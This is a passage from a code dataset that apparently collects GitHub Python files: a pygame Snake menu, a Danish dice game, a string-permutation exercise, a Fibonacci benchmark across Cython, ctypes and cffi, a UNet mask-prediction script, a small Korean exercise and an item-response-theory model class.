pygame.image.load(\"assets/credits_snakev2.jpg\")\r\n\r\n\r\nclick = False\r\n\r\n\r\nwindow = pygame.display.set_mode((WIDTH, WIDTH))\r\npygame.display.set_caption(\"Snake\")\r\n\r\ngame_clock = pygame.time.Clock()\r\ngame_over = False\r\npause_menu = False\r\ncredits_menu = False\r\nmenu = True\r\n\r\nFONT = pygame.font.Font(\"assets/PressStart2P.ttf\", 24)\r\n\r\n#font = pygame.font.SysFont(None, 20)\r\n\r\n\r\n#def draw_text(text, font, color, surface, x, y):\r\n # textobj = font.render(text, 1, color)\r\n # textrect = textobj.get_rect()\r\n # textrect.topleft = (x, y)\r\n # surface.blit(textobj, textrect)\r\n\r\n\r\ndef run_menu():\r\n global menu\r\n while menu:\r\n window.fill((0, 0, 0, 0))\r\n window.blit(main_menu, (0, 0))\r\n\r\n start_button = pygame.Rect(50, 200, 200, 50)\r\n credits_button = pygame.Rect(50, 300, 200, 50)\r\n pygame.image.load(\"assets/Start.png\")\r\n pygame.image.load(\"assets/credits.png\")\r\n\r\n start_message = FONT.render(\"Start\", 1, COLOR_WHITE)\r\n window.blit(start_message, (50, 200))\r\n\r\n\r\n credits_option = FONT.render(\"Credits\", 1, COLOR_WHITE)\r\n window.blit(credits_option, (50, 300))\r\n\r\n #draw_text('main menu', font, (255, 255, 255), window, 20, 20)\r\n\r\n #pygame.draw.rect(window, (255, 0, 0), start_button)\r\n #pygame.draw.rect(window, (0, 0, 255), credits_button)\r\n\r\n mx, my = pygame.mouse.get_pos()\r\n\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n quit()\r\n\r\n elif event.type == pygame.MOUSEBUTTONDOWN:\r\n if event.button == 1:\r\n if start_button.collidepoint((mx, my)):\r\n menu = False\r\n elif credits_button.collidepoint((mx, my)):\r\n credits()\r\n\r\n\r\n\r\n\r\n game_clock.tick(SPEED)\r\n pygame.display.update()\r\n\r\n\r\n\r\ndef pause():\r\n pause_menu = True\r\n while pause_menu:\r\n\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n quit()\r\n elif event.type == pygame.MOUSEBUTTONDOWN:\r\n if event.button == 1:\r\n pause_menu = False\r\n\r\n window.fill((0, 0, 0, 0))\r\n game_clock.tick(SPEED)\r\n window.blit(pause_menu_image, (0, 0))\r\n\r\n pause_message = FONT.render(\"Click to return\", 1, COLOR_WHITE)\r\n window.blit(pause_message, (50, 300))\r\n\r\n pygame.display.update()\r\n\r\ndef credits():\r\n credits_menu = True\r\n while credits_menu:\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n quit()\r\n elif event.type == pygame.MOUSEBUTTONDOWN:\r\n if event.button == 1:\r\n credits_menu = False\r\n\r\n window.fill((0, 0, 0, 0))\r\n game_clock.tick(SPEED)\r\n window.blit(credits_menu_image, (0, 0))\r\n\r\n pygame.display.update()\r\n\r\n","repo_name":"ghffadel/Snake","sub_path":"menuv1.py","file_name":"menuv1.py","file_ext":"py","file_size_in_byte":3308,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"9104489445","text":"import random\n\nclass Terning():\n\n def __init__(self, antalSider=6):\n self.sider = antalSider\n self.rul()\n\n def rul(self):\n self.slaget = random.randint(1, self.sider)\n return self.slaget\n\nclass Raflebaeger():\n\n def __init__(self):\n self.terninger = []\n\n def add(self, terningen):\n self.terninger.append(terningen)\n\n def remove(self, terningen):\n self.terninger.remove(terningen)\n\n def roll(self):\n for terning in self.terninger:\n terning.rul()\n\n def showResults(self):\n out = ''\n for terning in self.terninger:\n out += 'd{}: {}\\n'.format(terning.sider, terning.slaget)\n return out\n\nclass SpillerController():\n \"\"\"\n Denne klasse kontrollerer data og handlinger for spillerne i spillet 1-100.\n \"\"\"\n def __init__(self, navn='Rudolf'):\n \"\"\"\n Initialiserer instansvariable, herunder spillerens navn til 'Rudolf',\n hvis andet ikke er angivet som parameter.\n \"\"\"\n self.baeger = Raflebaeger()\n self.baeger.add(Terning(6))\n self.points = 0\n self.turPoints = 0\n self.navn = navn\n\n def rul(self):\n \"\"\"\n Metoden ruller raflebægeret og opdaterer spillerens points for denne tur\n med resultatet. Slår spilleren 1 med en terning, bliver turens points nulstillet.\n \"\"\"\n self.baeger.roll()\n for terning in self.baeger.terninger:\n if terning.slaget == 1:\n self.turPoints = 0\n else:\n self.turPoints += terning.slaget\n\n def stop(self):\n \"\"\"\n Metoder lægger points optjent i den aktive tur til det totale pointtal\n og nulstiller tælleren for points i den aktive tur.\n \"\"\"\n self.points += self.turPoints\n self.turPoints = 0\n\nclass SpilController():\n \"\"\"\n Denne klasse kontrollerer data og forløb for et spil 1-100.\n Parametren 'spillere' er en liste af strings, som repræsenterer spillernes navne.\n Hvis andet ikke er angivet bliver spillet oprettet med spillerne 'Spiller 1'\n og 'Spiller 2'.\n Parametren 'target' er pointmålet for spillerne. Hvis andet ikke er angivet,\n er dette 100.\n \"\"\"\n\n def __init__(self, spillere=['Spiller 1', 'Spiller 2'], target=100):\n \"\"\"\n Initialiserer instansvariable. Metoden sikrer, at der er mindst en spiller\n og sætter den aktive spiller til den første i listen.\n \"\"\"\n self.spillere = []\n if len(spillere) < 1:\n self.spillere.append(SpillerController('Solospiller'))\n else:\n for navn in spillere:\n self.spillere.append(SpillerController(navn))\n self.aktivSpiller = self.spillere[0]\n self.vinder = None\n self.ture = 1\n self.target = target\n\n def skiftSpiller(self):\n \"\"\"\n Skifter den aktive spiller til den næste i rækken eller til den første,\n hvis enden af rækken er nået.\n \"\"\"\n self.ture += 1\n aktivIndex = self.spillere.index(self.aktivSpiller)\n if aktivIndex == len(self.spillere)-1:\n self.aktivSpiller = self.spillere[0]\n else:\n self.aktivSpiller = self.spillere[aktivIndex+1]\n\n def checkForSejr(self):\n \"\"\"\n Kontrollerer om der kan kåres en vinder af spillet. Følgende betingelser\n skal være opfyldt:\n - Mindst en spiller skal have nået pointmålet\n - Alle spillere skal have haft lige mange ture\n - Maksimalt en spiller har det højeste antal points\n \"\"\"\n maxPoints = 0\n uafgjort = False\n potentielVinder = None\n for spiller in self.spillere:\n if spiller.points > maxPoints:\n potentielVinder = spiller\n maxPoints = spiller.points\n uafgjort = False\n elif spiller.points == maxPoints:\n uafgjort = True\n if not uafgjort and potentielVinder.points >= self.target and self.ture % len(self.spillere) == 0 and self.ture > 0:\n self.vinder = potentielVinder\n\n\n def spil(self, valg):\n \"\"\"\n Modtager spillerens handling ('rul' eller 'stop') og afvikler spillerens\n tur jævnfør spillets regler.\n Metoden har forskellige returværdier afhængig af resultatet af spillerens\n handling og terningernes udfald:\n - 'død': Spilleren har sl��et 1, og turen skifter til næste spiller\n - 'fortsæt': Spilleren kan fortsætte\n - 'stop': Spilleren stopper sin tur, lægger de optjente points til\n totalen og turen skifter til næste spiller\n \"\"\"\n if valg == 'rul':\n self.aktivSpiller.rul()\n if self.aktivSpiller.turPoints == 0:\n self.skiftSpiller()\n return 'død'\n return 'fortsæt'\n elif valg == 'stop':\n self.aktivSpiller.stop()\n self.checkForSejr()\n self.skiftSpiller()\n return 'stop'\n\nclass SpilView():\n \"\"\"\n Denne klasse udstiller et tekstbaseret brugerinterface til spillet 1-100.\n \"\"\"\n def __init__(self):\n \"\"\"\n Indhenter navne på de deltagende spillere, opretter en instans af\n spillet ud fra listen og viser en tekstmenu baseret på spillets tilstand.\n Når en vinder er fundet bliver stillingen samt vinderens navn udskrevet,\n og programmet slutter.\n \"\"\"\n spillernavne = self.genererSpillerListe()\n self.spillet = SpilController(spillernavne, 10)\n while self.spillet.vinder == None:\n self.printStilling()\n print('{} har turen'.format(self.spillet.aktivSpiller.navn))\n valg = input('Rul eller Stop? ')\n resultat = self.spillet.spil(valg)\n if valg == 'rul':\n if resultat == 'død':\n print('Du slog 1. Turen skifter.')\n elif resultat == 'fortsæt':\n print(self.spillet.aktivSpiller.baeger.showResults())\n self.printTurStilling()\n\n print('\\nSpillet er slut')\n self.printStilling()\n print('{} er vinderen!'.format(self.spillet.vinder.navn))\n\n def genererSpillerListe(self):\n \"\"\"\n Genererer en liste af stings med spilleres navne (med stort forbogstav)\n ud fra spillerens indtastninger og returnerer den.\n \"\"\"\n spillerliste = []\n nyspiller = None\n while nyspiller != '':\n nyspiller = input('Indtast navn på spiller eller ENTER for at færdiggøre\\n')\n spillerliste.append(nyspiller.title())\n return spillerliste[:len(spillerliste)-1]\n\n def printStilling(self):\n \"\"\"\n Udskriver spillets øjeblikkelige stilling.\n \"\"\"\n print('Stilling:')\n for spiller in self.spillet.spillere:\n print('{}: {}'.format(spiller.navn, spiller.points))\n\n def printTurStilling(self):\n \"\"\"\n Udskriver det optjente pointtal for den aktive spiller.\n \"\"\"\n print('Tur: {}\\n'.format(self.spillet.aktivSpiller.turPoints))\n\nif __name__ == '__main__':\n SpilView()\n","repo_name":"joshtempest/Atom","sub_path":"HTX Vordingborg/Programmering/Random/spil.py","file_name":"spil.py","file_ext":"py","file_size_in_byte":7209,"program_lang":"python","lang":"da","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"17430865342","text":"from __future__ import print_function\n\"\"\"\n# Prompt\n# 1.2 : Given two strings, write a method to decide if one is a permutation of other.\n# Example:\n# \"sumit\" and \"tiums\" are permutations of each other.\n# \"abcd\" and bdea\" are not permutations of each other.\n\"\"\"\n\nprint(\"1.2\")\n\n\"\"\"\n# IsStringPermutation\n# This function takes in two strings then moves through each slot\n# in string 2 comparing if they have the same letters and if they\n# are the same size with the same variables they are the\n# permutation of each other.\n\"\"\"\ndef IsStringPermutation(xString1, xString2):\n sameLetterCount = 0\n\n if IsSameSize(xString1, xString2):\n for x in range(len(string1)):\n for i in range(len(string2)):\n if string1[x] == string2[i]:\n sameLetterCount = sameLetterCount + 1\n if sameLetterCount == len(string1) and sameLetterCount == len(string2):\n return True\n else:\n return False\n else:\n return False\n\n\n\"\"\"\n IsSameSize\n This function takes two strings in and returns if they are the\n same size or not with a true or false return\n\"\"\"\ndef IsSameSize(xString1, xString2):\n if len(xString1) == len(xString2):\n return True\n else:\n return False\n\n\n\"\"\"\n PrintResult\n This function takes in a true or false and returns the\n correct output message depending on what was passed in.\n\"\"\"\ndef PrintResult(xResult):\n if xResult:\n print(\"\\nTwo Strings are permutations\")\n else:\n print(\"\\nStrings are not permutations\")\n\n\nprint(\"\\nStarting Program\\n\")\n\nstring1 = \"sumit\"\nstring2 = \"tiums\"\n\nprint(\"String 1:\", string1)\nprint(\"String 2:\", string2)\n\nresult = IsStringPermutation(string1, string2)\n\nPrintResult(result)\n\nprint(\"\\nThe Big O of this Solution is O(n^2)\")\n\nprint(\"\\nEnd of Program\")\n","repo_name":"cameronww7/Python-Workspace","sub_path":"CTCI/C-1/1.2.py","file_name":"1.2.py","file_ext":"py","file_size_in_byte":1824,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"18141068314","text":"#! /usr/bin/env python3\n\nimport time\nimport ctypes\n\nimport pyximport\nimport cffi\n\nimport cutils\n\nN = 36\n\ndef rfib(n):\n if n < 2:\n return 1\n return rfib(n-1) + rfib(n-2)\n\ndef fib(n):\n a, b = 1, 1\n for _ in range(n):\n a,b = a+b, a\n return b\n\ndef pour_python():\n start_ts = time.time()\n rres = rfib(N)\n end_ts = time.time()\n print(f\"[python] rres = {rres}, time = {end_ts - start_ts}\")\n start_ts = time.time()\n res = fib(N)\n end_ts = time.time()\n print(f\"[python] res = {res}, time = {end_ts - start_ts:.09f}\")\n\ndef cython():\n import cyutils\n start_ts = time.time()\n rres = cyutils.rfib(N)\n end_ts = time.time()\n print(f\"[cython] rres = {rres}, time = {end_ts - start_ts}\")\n start_ts = time.time()\n res = cyutils.fib(N)\n end_ts = time.time()\n print(f\"[cython] res = {res}, time = {end_ts - start_ts:.09f}\")\n\ndef ctypes_fib():\n lib = ctypes.cdll.LoadLibrary('./ctypes_lib/libutils.so')\n lib.fib.restype = ctypes.c_int\n lib.fib.argstype = [ctypes.c_int]\n lib.rfib.restype = ctypes.c_int\n lib.rfib.argstype = [ctypes.c_int]\n\n start_ts = time.time()\n rres = lib.rfib(N)\n end_ts = time.time()\n print(f\"[ctypes] rres = {rres}, time = {end_ts - start_ts}\")\n start_ts = time.time()\n res = lib.fib(N)\n end_ts = time.time()\n print(f\"[ctypes] res = {res}, time = {end_ts - start_ts:.09f}\")\n\ndef cffi_fib():\n ffi = cffi.FFI()\n cffi_lib = ffi.dlopen('./cffi_lib/libutils.so')\n ffi.cdef('''\n int rfib(int);\n int fib(int);\n ''')\n\n start_ts = time.time()\n rres = cffi_lib.rfib(N)\n end_ts = time.time()\n print(f\"[cffi] rres = {rres}, time = {end_ts - start_ts}\")\n start_ts = time.time()\n res = cffi_lib.fib(N)\n end_ts = time.time()\n print(f\"[cffi] res = {res}, time = {end_ts - start_ts:.09f}\")\n\ndef capi():\n start_ts = time.time()\n rres = cutils.rfib(N)\n end_ts = time.time()\n print(f\"[capi] rres = {rres}, time = {end_ts - start_ts}\")\n start_ts = time.time()\n res = cutils.fib(N)\n end_ts = time.time()\n print(f\"[capi] res = {res}, time = {end_ts - start_ts:.09f}\")\n\ndef main():\n pour_python()\n cython()\n ctypes_fib()\n cffi_fib()\n capi()\n\nif __name__ == \"__main__\":\n pyximport.install()\n main()\n","repo_name":"mailcourses/hse_deep_python_autumn_2023","sub_path":"lesson-13/src/perf.py","file_name":"perf.py","file_ext":"py","file_size_in_byte":2282,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"15387293865","text":"import argparse\nimport logging\nimport os\n\nimport numpy as np\nimport torch\nimport torch.nn.functional as F\nfrom PIL import Image\nfrom torchvision import transforms\n\nfrom utils.data_loading import BasicDataset\nfrom unet import UNet\nfrom utils.utils import plot_img_and_mask\nimport matplotlib.pyplot as plt\nimport cv2\n\ndef predict_img(net,\n full_img,\n device,\n scale_factor=1,\n out_threshold=0.5):\n net.eval()\n img = torch.from_numpy(BasicDataset.preprocess(full_img, scale_factor, is_mask=False))\n img = img.unsqueeze(0)\n img = img.to(device=device, dtype=torch.float32)\n\n with torch.no_grad():\n output = net(img)\n\n if net.n_classes > 1:\n probs = F.softmax(output, dim=1)[0]\n else:\n probs = torch.sigmoid(output)[0]\n\n tf = transforms.Compose([\n transforms.ToPILImage(),\n transforms.Resize((full_img.size[1], full_img.size[0])),\n transforms.ToTensor()\n ])\n\n full_mask = tf(probs.cpu()).squeeze()\n\n if net.n_classes == 1:\n return (full_mask > out_threshold).numpy()\n else:\n return F.one_hot(full_mask.argmax(dim=0), net.n_classes).permute(2, 0, 1).numpy()\n\n\ndef get_args():\n parser = argparse.ArgumentParser(description='Predict masks from input images')\n parser.add_argument('--model', '-m', default='MODEL.pth', metavar='FILE',\n help='Specify the file in which the model is stored')\n parser.add_argument('--input', '-i', metavar='INPUT', nargs='+', help='Filenames of input images')\n parser.add_argument('--output', '-o', metavar='OUTPUT', nargs='+', help='Filenames of output images')\n parser.add_argument('--viz', '-v', action='store_true',\n help='Visualize the images as they are processed')\n parser.add_argument('--no-save', '-n', action='store_true', help='Do not save the output masks')\n parser.add_argument('--mask-threshold', '-t', type=float, default=0.5,\n help='Minimum probability value to consider a mask pixel white')\n parser.add_argument('--scale', '-s', type=float, default=0.5,\n help='Scale factor for the input images')\n parser.add_argument('--amp', action='store_true', default=False, help='Use mixed precision')\n parser.add_argument('--bilinear', action='store_true', default=False, help='Use bilinear upsampling')\n parser.add_argument('--classes', '-c', type=int, default=4, help='Number of classes')\n\n return parser.parse_args()\n\n\ndef get_output_filenames(args):\n def _generate_name(fn):\n split = os.path.splitext(fn)\n return f'{split[0]}_OUT{split[1]}'\n\n return args.output or list(map(_generate_name, args.input))\n\n\ndef mask_to_image(mask: np.ndarray):\n if mask.ndim == 2:\n return Image.fromarray((mask * 255).astype(np.uint8))\n elif mask.ndim == 3:\n return Image.fromarray((np.argmax(mask, axis=0) * 255 / mask.shape[0]).astype(np.uint8))\n\ndef generate_img_from_points(txtpath, name):\n coords = []\n with open(os.path.join(txtpath,name), 'r') as f:\n lines = f.readlines()\n for line in lines:\n line = line.split(',')\n coords.append([float(line[0]),float(line[1])])\n coords = np.array(coords)\n y,x = coords.T\n y = abs(y-max(y))\n coords[:,0] = y\n print(np.max(x), np.max(y))\n plt.figure(figsize=(15, 15*(np.max(y)/np.max(x))))\n plt.xlim(0, np.max(x))\n plt.ylim(0, np.max(y))\n plt.axis('off')\n plt.scatter(x,y, s=5/(2**2))#, c=atoms_class_alline)\n plt.savefig(os.path.join(txtpath,'test_ml_4cls.png'), \\\n bbox_inches='tight', pad_inches=0, dpi=int(1*60))\n #plt.show()\n plt.close()\n\n img = cv2.imread(os.path.join(txtpath,'test_ml_4cls.png'), cv2.IMREAD_GRAYSCALE)\n img = abs(255-img)\n cv2.imwrite(os.path.join(txtpath,'test_ml_4cls.png'), img)\n ishape = img.shape\n print(ishape)\n # cv2.imshow('black_white',img)\n # cv2.waitKey(2000)\n x_1 = np.round(x*ishape[1]/np.max(x)); y_1 = ishape[0]-np.round(y*ishape[0]/np.max(y))\n x_1 = np.where(x_1>=ishape[1], ishape[1]-1, x_1)\n y_1 = np.where(y_1>=ishape[0], ishape[0]-1, y_1)\n coords = np.concatenate((y_1.reshape(-1,1), x_1.reshape(-1,1)), axis=1)\n return torch.Tensor(img/np.max(img)), torch.Tensor(coords)\n\nif __name__ == '__main__':\n args = get_args()\n device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n # in_files = args.input\n # out_files = get_output_filenames(args)\n\n #generate_img_from_points and add path\n # txtpath = '/hardisk/image_process/real_images/grain+boundry+disloaction'\n # name = 'grain boundary dislocation_pos_circularMask.txt'\n # txtpath = r'/hardisk/image_process/model_implication/811 LPSCl data needs phase segmentation/0067/crop'\n # name = r'5MX BF 0067.s_pos_guassianMask (2).txt'\n txtpath = r'/hardisk/image_process/RUnet/Pytorch-UNet/data/5samples/0070 crop/gaussion no sample iter2/0070 crop'\n name = r'0070 crop_pos_guassianMask.txt'\n images, coors = generate_img_from_points(txtpath, name)\n images = images.unsqueeze(dim=0).unsqueeze(dim=0)\n images = images.to(device=device, dtype=torch.float32)\n coors = coors.to(device=device, dtype=torch.float32).long()\n net = UNet(n_channels=1, n_classes=args.classes, bilinear=args.bilinear)\n\n logging.info(f'Loading model {args.model}')\n logging.info(f'Using device {device}')\n\n net.to(device=device)\n net.load_state_dict(torch.load(args.model, map_location=device))\n\n logging.info('Model loaded!')\n\n net.eval()\n with torch.cuda.amp.autocast(enabled=args.amp):\n masks_pred = net(images) \n print(masks_pred.shape) \n h_idx = coors[:,0].clone().detach()\n w_idx = coors[:,1].clone().detach()\n labels_pred= masks_pred[0].clone().permute(1,2,0)[h_idx, w_idx]\n length_points = len(labels_pred[0])\n labels_pred = torch.nn.functional.softmax(labels_pred, dim=1)\n # print(labels_pred[110:120])\n labels_pred = torch.argmax(labels_pred, dim=1)\n coors_label = torch.cat((coors, labels_pred.unsqueeze(dim=1)), dim=1)\n np.savetxt(os.path.join(txtpath, 'predict_4classes_4w.txt') ,np.array(coors_label.cpu()))\n y = abs(coors[:,0].cpu()-max(coors[:,0].cpu())); x = coors[:,1].cpu()\n pre = coors_label[:,2].cpu()\n color_label = []\n for num in pre:\n if num == 0:\n color_label.append('#0593A2')\n elif num == 1:\n color_label.append('#E3371E')\n elif num == 2:\n color_label.append('#151F30')\n elif num == 3:\n color_label.append('#BF9000')\n ax = plt.gca()\n ax.set_aspect(1)\n plt.scatter(x, y, s=1, c=color_label)#, cmap='Dark2')\n plt.savefig(os.path.join(txtpath, 'predict_4classes_4w'),dpi=400)\n plt.show()\n","repo_name":"xinhuolin/HaUnet_paper","sub_path":"predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":6883,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"61"} +{"seq_id":"24546614802","text":"'''\n정보 선생님은 오늘도 이상한 출석을 부른다.\n\n영일이는 오늘도 다른 생각을 해보았다.\n출석 번호를 다 부르지는 않은 것 같은데... 가장 빠른 번호가 뭐였지?\n\n출석 번호를 n번 무작위로 불렀을 때, 가장 빠른 번호를 출력해 보자.\n'''\n\nn = int(input())\ncall_list = list(map(int, input().split()))\n\nm = call_list[0]\nfor i in range(1, n):\n if call_list[i] < m:\n m = call_list[i]\n\nprint(m)\n","repo_name":"rickcmc02/Algorithm","sub_path":"CodeUp/02_Python100/6094_이상한 출석 번호 부르기3.py","file_name":"6094_이상한 출석 번호 부르기3.py","file_ext":"py","file_size_in_byte":472,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"11160139030","text":"import os\nimport sys\nimport numpy as np\nimport pandas as pd\nfrom scipy.special import expit as sigmod\nfrom scipy.optimize import minimize\nimport tempfile\nimport logging\n\n\n\nclass UIrt2PL:\n # logger = logging.getLogger()\n\n def __init__(self, D=1.702, logger=logging.getLogger()):\n self.D = D\n self.k = 1\n self.user_vector = None\n self.item_vector = None\n self.logger = logger\n self.model = None\n self.response_sequence = None\n\n def fit(self, response: pd.DataFrame, sequential=True):\n \"\"\"\n :param response_df: 作答数据,必须包含三列 user_id item_id answer\n D=1.702\n \"\"\"\n assert response is not None\n if 'new_difficulty' in response.columns and 'b' not in response.columns:\n response.rename(columns={'new_difficulty': 'b'}, inplace=True)\n elif 'difficulty' in response.columns and 'b' not in response.columns:\n response.rename(columns={'difficulty': 'b'}, inplace=True)\n\n if 'discrimination' in response.columns and 'a' not in response.columns:\n response.rename(columns={'discrimination': 'a'}, inplace=True)\n elif 'a' not in response.columns:\n response.loc[:, 'a'] = 1\n\n if sequential:\n labels = {'user_id', 'item_id', 'answer', 'a', 'b', 'create_time', 'knowledge_id'}.intersection(\n response.columns)\n self.response_sequence = response[list(labels)]\n\n self.response_matrix = self.response_sequence.pivot(index=\"user_id\", columns=\"item_id\", values='answer')\n\n else:\n self.response_matrix = response.copy()\n self.response_matrix.index.name = 'user_id'\n # 矩阵形式生成序列数据\n self.response_sequence = pd.melt(self.response_matrix.reset_index(), id_vars=['user_id'],\n var_name=\"item_id\",\n value_name='answer')\n # 去掉空值\n self.response_sequence.dropna(inplace=True)\n\n #\n self._init_model()\n labels = set(response.columns).intersection({'a', 'b', 'c'})\n if sequential and labels:\n item_info = response[['item_id'] + list(labels)].drop_duplicates(subset=['item_id'])\n item_info.set_index('item_id', inplace=True)\n self.set_abc(item_info, columns=list(labels))\n\n ret = self.estimate_theta()\n self.model = self.user_vector\n return ret\n\n def _init_model(self):\n assert self.response_sequence is not None\n user_ids = list(self.response_matrix.index)\n user_count = len(user_ids)\n item_ids = list(self.response_matrix.columns)\n item_count = len(item_ids)\n self.user_vector = pd.DataFrame({\n 'iloc': np.arange(user_count),\n 'user_id': user_ids,\n 'theta': np.zeros(user_count)},\n index=user_ids)\n self.item_vector = pd.DataFrame(\n {'iloc': np.arange(item_count),\n 'item_id': item_ids,\n 'a': np.ones(item_count),\n 'b': np.zeros(item_count),\n 'c': np.zeros(item_count)}, index=item_ids)\n\n self.response_sequence = self.response_sequence.join(self.user_vector['iloc'].rename('user_iloc'), on='user_id',\n how='left')\n self.response_sequence = self.response_sequence.join(self.item_vector['iloc'].rename('item_iloc'), on='item_id',\n how='left')\n # 统计每个应试者的作答情况\n # user_stat = self.response_sequence.groupby('user_id')['answer'].aggregate(['count', 'sum']).rename(\n # columns={'sum': 'right'})\n # 注意:难度是浮点数,需要先转换为整型,然后在统计每个难度的分布\n x = self.response_sequence.astype({'b': 'int32'}).groupby(['user_id', 'b']).aggregate(\n {'answer': ['count', 'sum']})\n y = x.unstack()\n y.columns = [(col[1] + \"_\" + str(int(col[2]))).strip().replace('sum', 'right') for col in y.columns.values]\n\n for i in range(1, 6):\n i = int(i)\n if 'right_%s' % i in y.columns:\n y.loc[:, 'accuracy_%s' % i] = y['right_%s' % i] / y['count_%s' % i]\n\n y.loc[:, 'count_all'] = y.filter(regex='^count_', axis=1).sum(axis=1)\n y.loc[:, 'right_all'] = y.filter(regex='^right_', axis=1).sum(axis=1)\n y.loc[:, 'accuracy_all'] = y['right_all'] / y['count_all']\n\n self.user_vector = self.user_vector.join(y, how='left')\n # self.user_vector.fillna({'count': 0, 'right': 0}, inplace=True)\n # self.user_vector['accuracy'] = self.user_vector['right'] / self.user_vector['count']\n\n # 统计每个项目的作答情况\n item_stat = self.response_sequence.groupby('item_id')['answer'].aggregate(['count', 'sum']).rename(\n columns={'sum': 'right'})\n self.item_vector = self.item_vector.join(item_stat, how='left')\n self.item_vector.fillna({'count': 0, 'right': 0}, inplace=True)\n self.item_vector['accuracy'] = self.item_vector['right'] / self.item_vector['count']\n\n def set_theta(self, values):\n \"\"\"\n\n Parameters\n ----------\n values\n\n Returns\n -------\n\n \"\"\"\n assert isinstance(values, pd.DataFrame) or isinstance(values,\n np.ndarray), \"values的类型必须是pandas.DataFrame或numpy.ndarray\"\n\n if self.user_vector is None:\n assert isinstance(values, pd.DataFrame), \"values的类型必须是pandas.DataFrame\"\n user_count = len(values)\n user_ids = list(values.index)\n\n self.user_vector = pd.DataFrame({\n 'iloc': np.arange(user_count),\n 'user_id': user_ids,\n 'theta': values.loc[:, 'theta'].values.flatten(),\n },\n index=user_ids)\n\n else:\n if isinstance(values, pd.DataFrame):\n # self.user_vector = values\n self.user_vector.loc[values.index, 'theta'] = values.loc[:, 'theta'].values.flatten()\n\n elif isinstance(values, np.ndarray):\n self.user_vector.loc[:, 'theta'] = values.flatten()\n\n else:\n raise TypeError(\"values的类型必须是pandas.DataFrame 或numpy.ndarray\")\n\n def set_abc(self, values, columns=None):\n \"\"\"\n values 可以是pandas.DataFrame 或者 numpy.ndarray\n 当values:pandas.DataFrame,,shape=(n,len(columns)),一行一个item,\n pandas.DataFrame.index是item_id,columns包括a,b,c。\n\n 当values:numpy.ndarray,shape=(n,len(columns)),一行一个item,列对应着columns参数。\n Parameters\n ----------\n values\n columns 要设置的列\n\n Returns\n -------\n\n \"\"\"\n\n assert isinstance(values, pd.DataFrame) or isinstance(values,\n np.ndarray), \"values的类型必须是pandas.DataFrame或numpy.ndarray\"\n if columns is None:\n if isinstance(values, pd.DataFrame):\n columns = [x for x in ['a', 'b', 'c'] if x in values.columns]\n else:\n raise ValueError(\"需要指定columns\")\n\n if self.item_vector is None:\n assert isinstance(values, pd.DataFrame), \"values的类型必须是pandas.DataFrame\"\n item_count = len(values)\n item_ids = list(values.index)\n\n self.item_vector = pd.DataFrame({\n 'iloc': np.arange(item_count),\n 'item_id': item_ids,\n 'a': np.ones(item_count),\n 'b': np.zeros(item_count),\n 'c': np.zeros(item_count),\n\n },\n index=item_ids)\n\n self.item_vector.loc[:, columns] = values.loc[:, columns].values\n\n else:\n if isinstance(values, pd.DataFrame):\n # self.user_vector = values\n self.item_vector.loc[values.index, columns] = values.loc[:, columns].values\n\n elif isinstance(values, np.ndarray):\n self.item_vector.loc[:, columns] = values\n\n else:\n raise TypeError(\"values的类型必须是pandas.DataFrame或numpy.ndarray\")\n\n def set_items(self, items: pd.DataFrame):\n self.item_vector = items\n\n def set_users(self, users: pd.DataFrame):\n self.user_vector = users\n\n def predict_s(self, users, items):\n n = len(users)\n m = len(items)\n assert n == m, \"should length(users)==length(items)\"\n\n user_v = self.user_vector.loc[users, ['theta']]\n\n if isinstance(items, pd.DataFrame) and set(items.columns).intersection({'a', 'b'}):\n item_v = items.loc[:, ['a', 'b']]\n else:\n item_v = self.item_vector.loc[items, ['a', 'b']]\n\n z = self.D * item_v['a'].values * (user_v['theta'].values - item_v['b'].values)\n # z = alpha * (theta - beta)\n e = np.exp(z)\n s = e / (1.0 + e)\n return s\n\n def predict_x(self, users, items):\n if isinstance(items, pd.DataFrame):\n self.set_items(items)\n if isinstance(users, pd.DataFrame):\n self.set_theta(users)\n\n user_count = len(users)\n item_count = len(items)\n theta = self.user_vector.loc[users, 'theta'].values.reshape((user_count, 1))\n a = self.item_vector.loc[items, 'a'].values.reshape((1, item_count))\n b = self.item_vector.loc[items, 'b'].values.reshape((1, item_count))\n # c = self.item_vector.loc[items, 'c'].values.reshape((1, item_count))\n # c = c.repeat(user_count, axis=0)\n z = self.D* a.repeat(user_count, axis=0) * (\n theta.repeat(item_count, axis=1) - b.repeat(user_count, axis=0))\n prob_matrix = sigmod(z)\n # e = np.exp(z)\n # s = e / (1.0 + e)\n return prob_matrix\n\n def predict_simple(self, user_id, items: pd.DataFrame):\n \"\"\"\n\n Parameters\n ----------\n theta\n items\n\n Returns\n -------\n\n \"\"\"\n if user_id not in self.user_vector.index:\n self.logger.warning('IRT ' + str(user_id) + ' no_irt_theta')\n return pd.Series(data=[np.nan] * len(items), index=items.index), None\n\n if 'new_difficulty' in items.columns and 'b' not in items.columns:\n # candidate_items.rename(columns={'new_difficulty': 'b'}, inplace=True)\n items['b'] = items['new_difficulty']\n elif 'difficulty' in items.columns and 'b' not in items.columns:\n # candidate_items.rename(columns={'difficulty': 'b'}, inplace=True)\n items['b'] = items['difficulty']\n if 'discrimination' in items.columns and 'a' not in items.columns:\n # candidate_items.rename(columns={'discrimination': 'a'}, inplace=True)\n items['a'] = items['discrimination']\n elif 'a' not in items.columns:\n items.loc[:, 'a'] = 1\n\n theta = self.user_vector.loc[user_id, 'theta']\n a = items.loc[:, ['a']].values\n b = items.loc[:, ['b']].values\n z = self.D * a * (theta - b)\n prob = sigmod(z)\n # items['irt'] = prob\n return pd.Series(data=prob.flatten(), index=items.index), theta\n\n def predict_by_theta(self, theta, items: pd.DataFrame):\n \"\"\"\n\n Parameters\n ----------\n theta\n items\n\n Returns\n -------\n\n 